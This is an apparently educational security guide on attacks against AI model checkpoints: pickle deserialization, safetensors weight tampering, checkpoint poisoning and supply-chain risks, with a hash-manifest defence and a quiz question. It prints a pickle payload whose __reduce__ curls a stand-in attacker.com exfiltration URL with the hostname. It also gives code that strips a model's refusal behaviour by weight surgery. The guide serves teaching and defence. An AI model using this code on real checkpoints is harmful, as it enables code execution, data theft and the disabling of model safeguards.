Model Checkpoint & Recovery Attacks
Checkpoint file format vulnerabilities, modification attacks on safetensors and PyTorch formats, checkpoint poisoning, storage security, and supply chain implications.
Model checkpoints are the primary distribution mechanism for pre-trained models. A checkpoint file contains the model's learned weights -- and potentially arbitrary code. The security of checkpoint formats, storage systems, and distribution channels directly determines whether the model a user loads is the model the developer intended.
Checkpoint Format Security
Format Comparison
| Format | Serialization | Arbitrary Code Execution | Integrity Verification | Adoption |
|---|---|---|---|---|
PyTorch (.pt, .bin) | Python pickle | Yes -- code runs on torch.load() | None built-in | Legacy, declining |
Safetensors (.safetensors) | Custom binary, no code execution | No -- data-only format | Built-in hash validation | Growing, recommended |
GGUF (.gguf) | Custom binary format | No -- structured metadata + tensors | Metadata validation | llama.cpp ecosystem |
ONNX (.onnx) | Protocol Buffers | No -- declarative graph format | Protobuf validation | Inference-focused |
| TensorFlow SavedModel | Protocol Buffers + flat buffers | Limited -- custom ops can run code | Signature validation | TensorFlow ecosystem |
Pickle Deserialization Attacks
Python's pickle module can serialize arbitrary Python objects, including objects whose __reduce__ method returns code to execute during deserialization.
import pickle
import torch
import os
class MaliciousPayload:
"""
When unpickled, this object executes arbitrary code.
torch.load() calls pickle.load() internally.
"""
def __reduce__(self):
# This code runs when the checkpoint is loaded
return (os.system, ("curl https://attacker.com/exfil?h=$(hostname)",))
# Create a seemingly legitimate checkpoint with embedded payload
def create_poisoned_checkpoint(clean_model, output_path):
"""
Save a real model checkpoint that also executes code on load.
The model weights are valid -- the payload is a side effect.
"""
state_dict = clean_model.state_dict()
# Embed payload in an innocuous-looking key
state_dict["_metadata_version"] = MaliciousPayload()
torch.save(state_dict, output_path)
# File loads normally: model works, but code executed silentlySafetensors: Security Properties and Limitations
The safetensors format was designed specifically to address pickle deserialization risks. It stores tensors as raw bytes with a JSON metadata header -- no code execution is possible during loading.
What Safetensors Protects Against
| Attack | Protected? | How |
|---|---|---|
| Arbitrary code execution on load | Yes | No code in format, pure data |
| Weight modification in transit | Partially | File-level hash, but no per-tensor signing |
| Weight modification at rest | No | No encryption, anyone with file access can modify |
| Metadata poisoning | Partially | Metadata is JSON, validated but not signed |
| File substitution | No | Must verify file hash externally |
What Safetensors Does NOT Protect Against
# Safetensors prevents code execution but NOT weight modification
from safetensors.torch import load_file, save_file
def modify_safetensors_weights(input_path, output_path, layer_name,
modification_fn):
"""
Load a safetensors file, modify specific weights, and save.
This is trivial for anyone with file access.
Safetensors provides no tamper detection after creation.
"""
tensors = load_file(input_path)
if layer_name in tensors:
original = tensors[layer_name]
tensors[layer_name] = modification_fn(original)
save_file(tensors, output_path)
# Output file is a valid safetensors file with modified weights
# No indication of tampering unless external hash is checkedCheckpoint Modification Attacks
Weight Surgery
An attacker with access to stored checkpoints can perform targeted weight modifications without full retraining. This is faster and cheaper than data poisoning.
Identify target neurons
Use interpretability tools (probing, activation analysis) to identify neurons or attention heads responsible for specific behaviors -- particularly safety-relevant behaviors.
Compute adversarial weight delta
Calculate the minimal weight change needed to alter the target behavior. This can be done through gradient-based optimization on a small dataset.
Apply the modification
Load the checkpoint, modify the identified parameters, and save. The change is small enough that overall model quality metrics remain unchanged.
Replace the original checkpoint
Substitute the modified checkpoint in the storage system. If no integrity verification exists, the swap is undetectable.
# Targeted weight surgery to disable a safety behavior
def disable_refusal_behavior(model_path, output_path,
refusal_direction, scale=2.0):
"""
Remove the model's refusal behavior by subtracting
the refusal direction from relevant weight matrices.
Based on research showing refusal is often encoded as a
linear direction in activation space.
"""
tensors = load_file(model_path)
# Modify output projection weights in middle layers
# where refusal behavior is typically encoded
for layer_idx in range(12, 24): # Middle layers
key = f"model.layers.{layer_idx}.self_attn.o_proj.weight"
if key in tensors:
W = tensors[key].float()
# Project out the refusal direction
refusal_component = torch.outer(
refusal_direction, refusal_direction
) @ W
tensors[key] = (W - scale * refusal_component).half()
save_file(tensors, output_path)Supply Chain Risks in Model Distribution
Public Registry Vulnerabilities
| Registry | Risk | Mitigation |
|---|---|---|
| Hugging Face Hub | Model impersonation, checkpoint substitution | Signed commits, organizational verification |
| Ollama Library | Modified GGUF files | SHA256 manifest verification |
| PyTorch Hub | Pickle-based checkpoints | weights_only=True, migrate to safetensors |
| Custom S3/GCS buckets | No access control by default | IAM policies, bucket versioning, access logging |
Checkpoint Integrity Pipeline
import hashlib
from pathlib import Path
def create_checkpoint_manifest(checkpoint_dir: str) -> dict:
"""
Create a signed manifest of all checkpoint files.
Verify this manifest before loading any checkpoint.
"""
manifest = {"files": {}, "created": "2026-03-13"}
for path in Path(checkpoint_dir).glob("**/*"):
if path.is_file():
sha256 = hashlib.sha256(path.read_bytes()).hexdigest()
manifest["files"][str(path.relative_to(checkpoint_dir))] = {
"sha256": sha256,
"size": path.stat().st_size,
"format": path.suffix,
}
return manifest
def verify_checkpoint_manifest(checkpoint_dir: str,
manifest: dict) -> list[str]:
"""
Verify all files match their expected hashes.
Returns list of files that fail verification.
"""
failures = []
for rel_path, expected in manifest["files"].items():
full_path = Path(checkpoint_dir) / rel_path
if not full_path.exists():
failures.append(f"MISSING: {rel_path}")
continue
actual_hash = hashlib.sha256(full_path.read_bytes()).hexdigest()
if actual_hash != expected["sha256"]:
failures.append(f"MODIFIED: {rel_path}")
return failuresCheckpoint Recovery Attacks
Training checkpoints saved for crash recovery introduce additional risks:
| Attack | Description | Impact |
|---|---|---|
| Checkpoint rollback | Replace current checkpoint with an earlier one | Undo safety training progress |
| Checkpoint injection | Insert a checkpoint from a different training run | Completely different model weights |
| Recovery poisoning | Modify the checkpoint just before a recovery event | Model resumes training from a compromised state |
| Optimizer state manipulation | Modify saved optimizer state (momentum, Adam states) | Subtly influence future gradient updates |
Related Topics
- Pre-training Attack Surface -- Broader pre-training vulnerability context
- Pickle Exploits -- Deep dive into pickle deserialization attacks
- LoRA & Adapter Attacks -- Adapter-specific checkpoint risks
- Model Supply Chain -- End-to-end supply chain security
A team downloads a model checkpoint from a public registry in safetensors format. Which of the following attacks is the safetensors format designed to prevent?
References
- Safetensors: Simple, Safe Way to Store and Distribute Tensors (Hugging Face) -- Format specification
- Pickle Serialization Security (Python docs) -- Official security warnings
- Hugging Face Hub Security (Hugging Face) -- Registry security features